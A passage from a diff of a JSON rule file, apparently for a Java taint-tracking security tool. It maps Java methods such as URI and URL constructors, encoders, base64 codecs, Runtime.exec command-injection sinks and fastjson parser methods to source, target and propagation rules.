"", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1,2,3", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String)" + "value": "java.net.IDN.toASCII(java.lang.String,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1,2,3,5,6,7", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,java.lang.String,java.lang.String)" + "value": "java.net.IDN.toUnicode(java.lang.String,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1,2,3,4,5", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "R", "track": "false", "untags": [], - "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.lang.String)" + "value": "java.nio.channels.Channels.newChannel(java.io.InputStream)" }, { "command": "", @@ -2112,43 +2327,36 @@ "source": "O", "stack_blacklist": [], "tags": [], - "target": "R", + "target": "P1", "track": "false", "untags": [], - "value": "java.net.URI.toURL()" - } - ], - "enable": 1, - "type": 1, - "value": "URI" - }, - { - "details": [ + "value": "java.nio.channels.ReadableByteChannel.read(java.nio.ByteBuffer)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1,2,4", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "O", + "target": "P1", "track": "false", "untags": [], - "value": "java.net.URL.(java.lang.String,java.lang.String,int,java.lang.String,java.net.URLStreamHandler)" + "value": "java.security.SecureRandom.nextBytes(byte[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1,2", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", "track": "false", "untags": [], - "value": "java.net.URL.(java.net.URL,java.lang.String,java.net.URLStreamHandler)" + "value": "java.util.StringTokenizer.(java.lang.String)" }, { "command": "", @@ -2157,16 +2365,11 @@ "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "url-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "url-encoded", - "xss-encoded" - ], - "value": "java.net.URLDecoder.decode(java.lang.String,java.lang.String)" + "untags": [], + "value": "java.util.StringTokenizer.(java.lang.String,java.lang.String)" }, { "command": "", @@ -2175,118 +2378,97 @@ "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "url-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "url-encoded", - "xss-encoded" - ], - "value": "java.net.URLDecoder.decode(java.lang.String,java.nio.charset.Charset)" + "untags": [], + "value": "java.util.StringTokenizer.(java.lang.String,java.lang.String,boolean)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "P2", "stack_blacklist": [], - "tags": [ - "url-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "url-decoded" - ], - "value": "java.net.URLEncoder.encode(java.lang.String,java.lang.String)" + "untags": [], + "value": "java.util.logging.LogRecord.(java.util.logging.Level,java.lang.String)" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "O", "stack_blacklist": [], - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "url-decoded" - ], - "value": "java.net.URLEncoder.encode(java.lang.String,java.nio.charset.Charset)" + "untags": [], + "value": "java.util.logging.LogRecord.getMessage()" }, { - "command": "", + "command": "KEEP()", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "url-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeRedirectURL(java.lang.String)" + "untags": [], + "value": "java.util.logging.LogRecord.setMessage(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "url-encoded" + "html-encoded" ], "target": "R", "track": "false", "untags": [ - "url-decoded" + "html-decoded" ], - "value": "javax.servlet.http.HttpServletResponse.encodeRedirectUrl(java.lang.String)" + "value": "nu.xom.Attribute.escapeText(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "url-encoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "url-decoded" - ], - "value": "javax.servlet.http.HttpServletResponse.encodeURL(java.lang.String)" + "untags": [], + "value": "org.apache.catalina.connector.Request.unescape(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [ - "url-encoded" + "html-encoded" ], "target": "R", "track": "false", "untags": [ - "url-decoded" + "html-decoded" ], - "value": "javax.servlet.http.HttpServletResponse.encodeUrl(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.escapeJavaScript(java.lang.String)" }, { "command": "", @@ -2296,38 +2478,31 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "url-encoded" + "sql-encoded" ], "target": "R", "track": "false", "untags": [ - "url-decoded" + "sql-decoded" ], - "value": "org.apache.catalina.util.URLEncoder.encode(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "URL" - }, - { - "details": [ + "value": "org.apache.commons.lang.StringEscapeUtils.escapeSQL(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "P1", "stack_blacklist": [], "tags": [ - "html-encoded" + "html-decoded" ], - "target": "P1", + "target": "R", "track": "false", "untags": [ - "html-decoded" + "html-encoded" ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.io.Writer,java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeJavaScript(java.lang.String)" }, { "command": "", @@ -2336,134 +2511,175 @@ "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], + "tags": [], "target": "R", - "track": "", - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.lang.String)" + "track": "false", + "untags": [], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeEcmaScript(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "O", "stack_blacklist": [], - "tags": [ - "xss-encoded" - ], - "target": "P1", + "tags": [], + "target": "R", "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.io.Writer,java.lang.String)" - }, + "untags": [], + "value": "sun.net.www.protocol.http.HttpURLConnection.getInputStream()" + } + ], + "enable": 1, + "type": 1, + "value": "StringBuilder" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], - "tags": [ - "xml-encoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "xml-decoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.lang.String)" - }, + "untags": [], + "value": "org.apache.struts2.dispatcher.multipart.MultiPartRequest.getParameterValues(java.lang.String)" + } + ], + "enable": 1, + "type": 2, + "value": "Struts2" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "P1", "stack_blacklist": [], - "tags": [ - "html-decoded" - ], - "target": "P1", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.net.URI.(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "P1,2,3", "stack_blacklist": [], - "tags": [ - "html-decoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "html-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.lang.String)" + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P2", + "source": "P1,2,3,5,6,7", "stack_blacklist": [], - "tags": [ - "xml-decoded" - ], - "target": "P1", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.io.Writer,java.lang.String)" + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "P1,2,3,4", "stack_blacklist": [], - "tags": [ - "xml-decoded" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "xml-encoded" - ], - "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.lang.String)" + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "P1,2,3,4,5", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", + "tags": [], + "target": "O", "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml3(java.lang.String)" + "untags": [], + "value": "java.net.URI.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "java.net.URI.toURL()" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "java.nio.file.spi.FileSystemProvider.getPath(java.net.URI)" + } + ], + "enable": 1, + "type": 1, + "value": "URI" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,4", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.net.URL.(java.lang.String,java.lang.String,int,java.lang.String,java.net.URLStreamHandler)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "java.net.URL.(java.net.URL,java.lang.String,java.net.URLStreamHandler)" }, { "command": "", @@ -2473,14 +2689,15 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "html-encoded" + "url-decoded" ], "target": "R", "track": "false", "untags": [ - "html-decoded" + "url-encoded", + "xss-encoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml4(java.lang.String)" + "value": "java.net.URLDecoder.decode(java.lang.String,java.lang.String)" }, { "command": "", @@ -2490,14 +2707,15 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "xml-encoded" + "url-decoded" ], "target": "R", "track": "false", "untags": [ - "xml-decoded" + "url-encoded", + "xss-encoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml(java.lang.String)" + "value": "java.net.URLDecoder.decode(java.lang.String,java.nio.charset.Charset)" }, { "command": "", @@ -2507,14 +2725,174 @@ "source": "P1", "stack_blacklist": [], "tags": [ - "xml-encoded" + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "java.net.URLEncoder.encode(java.lang.String,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "java.net.URLEncoder.encode(java.lang.String,java.nio.charset.Charset)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeRedirectURL(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeRedirectUrl(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeURL(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "javax.servlet.http.HttpServletResponse.encodeUrl(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "url-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "url-decoded" + ], + "value": "org.apache.catalina.util.URLEncoder.encode(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "URL" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "P1", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" ], "target": "R", + "track": "", + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.escapeHtml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2", + "stack_blacklist": [], + "tags": [ + "xss-encoded" + ], + "target": "P1", "track": "false", "untags": [ "xml-decoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml10(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.io.Writer,java.lang.String)" }, { "command": "", @@ -2531,533 +2909,1408 @@ "untags": [ "xml-decoded" ], - "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml11(java.lang.String)" + "value": "org.apache.commons.lang.StringEscapeUtils.escapeXml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2", + "stack_blacklist": [], + "tags": [ + "html-decoded" + ], + "target": "P1", + "track": "false", + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeHtml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2", + "stack_blacklist": [], + "tags": [ + "xml-decoded" + ], + "target": "P1", + "track": "false", + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.io.Writer,java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-decoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang.StringEscapeUtils.unescapeXml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml3(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeHtml4(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml10(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-decoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.escapeXml11(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml3(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "html-decoded" + ], + "target": "R", + "track": "false", + "untags": [ + "html-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeHtml4(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-decoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-encoded" + ], + "value": "org.apache.commons.lang3.StringEscapeUtils.unescapeXml(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [ + "xml-encoded" + ], + "target": "R", + "track": "false", + "untags": [ + "xml-decoded" + ], + "value": "org.apache.taglibs.standard.tag.common.core.Util.escapeXml(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "apache-filter" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Decoder.decode(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "P2", + "track": "", + "untags": [], + "value": "java.util.Base64$Decoder.decode(byte[],byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Decoder.decode(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Decoder.decode(java.nio.ByteBuffer)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decode(byte[],int,int,org.apache.commons.codec.binary.BaseNCodec$Context)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeBase64(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeBase64(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.decodeInteger(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.decode(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "base64-dec" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Encoder.encode(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "P2", + "track": "", + "untags": [], + "value": "java.util.Base64$Encoder.encode(byte[],byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Encoder.encode(java.nio.ByteBuffer)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "java.util.Base64$Encoder.encodeToString(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.Base64.encodeBase64(byte[],boolean,boolean,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(byte[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encode(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encodeAsString(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "", + "untags": [], + "value": "org.apache.commons.codec.binary.BaseNCodec.encodeToString(byte[])" + } + ], + "enable": 1, + "type": 1, + "value": "base64-enc" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.awt.Desktop.browse(java.net.URI)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.ProcessImpl.start(java.lang.String[],java.util.Map,java.lang.String,java.lang.ProcessBuilder$Redirect[],boolean)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String,java.lang.String[],java.io.File)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.lang.Runtime.exec(java.lang.String[],java.lang.String[],java.io.File)" + } + ], + "enable": 1, + "type": 4, + "value": "cmd-injection" + }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "P2", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.Object,com.alibaba.fastjson.parser.JSONLexer,com.alibaba.fastjson.parser.ParserConfig)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "O", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.DefaultJSONParser.(java.lang.String,com.alibaba.fastjson.parser.ParserConfig,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldBigInteger(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDate(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDecimal(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "O", + "stack_blacklist": [], + "tags": [], + "target": "R", + "track": "false", + "untags": [], + "value": "com.alibaba.fastjson.parser.JSONLexerBase.scanFieldDouble(char[])" + }, + { + "command": "", + 